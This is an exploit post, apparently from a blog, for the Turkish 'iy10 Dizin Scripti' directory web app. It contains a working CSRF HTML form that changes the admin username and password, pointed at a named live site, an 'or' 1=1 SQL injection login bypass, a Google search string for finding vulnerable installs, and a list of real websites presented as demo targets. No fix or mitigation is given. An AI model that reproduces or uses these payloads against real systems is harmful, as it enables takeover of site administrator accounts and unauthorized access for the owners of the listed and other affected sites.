~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com [~] Şeker Insanlar : ZoRLu, ( milw00rm.com ), Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon KedAns-Dz, b3mb4m ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : iy10 Dizin Scripti |~Affected Version : All Version |~Software : http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html |~RISK : High |~Google Keyword : "Sitenizi dizine eklemek için tıklayın !" ################++ DEMO ++ ####################################### http://www.servisservisi.com http://dafv.net http://toplist.anaforum.net http://linkekle.xyz http://sinbatanitim.com http://www.dizinim.tk/yeniler/ http://www.alacaticesme.com/yeniler/ http://www.hgndata.com/yeniler/ http://www.toplist.biz.tr/yeniler/ ################## ++ CSRF Admin Password Change Exploit ++ ###################################### <html> <body> <form action="http://www.servisservisi.com/admin/kullaniciayarlar.php" method="POST"> <input type="hidden" name="kullaniciadi" value="knockout" /> <input type="hidden" name="sifre" value="password" /> <input type="hidden" name="Submit" value="Exploit!" /> <input type="submit" value="Submit request" /> </form> </body> </html> ################# ++ SQL Injection with Authentication Bypass ++########################################### http://[TARGET]/admin ID: 'or' 1=1 PW : 'or' 1=1 ############################################################
10 Aralık 2015 Perşembe
iy10 Dizin Scripti - Multiple Vulnerabilities (CSRF & Authentication Bypass)
Kaydol:
Kayıt Yorumları (Atom)
Hiç yorum yok:
Yorum Gönder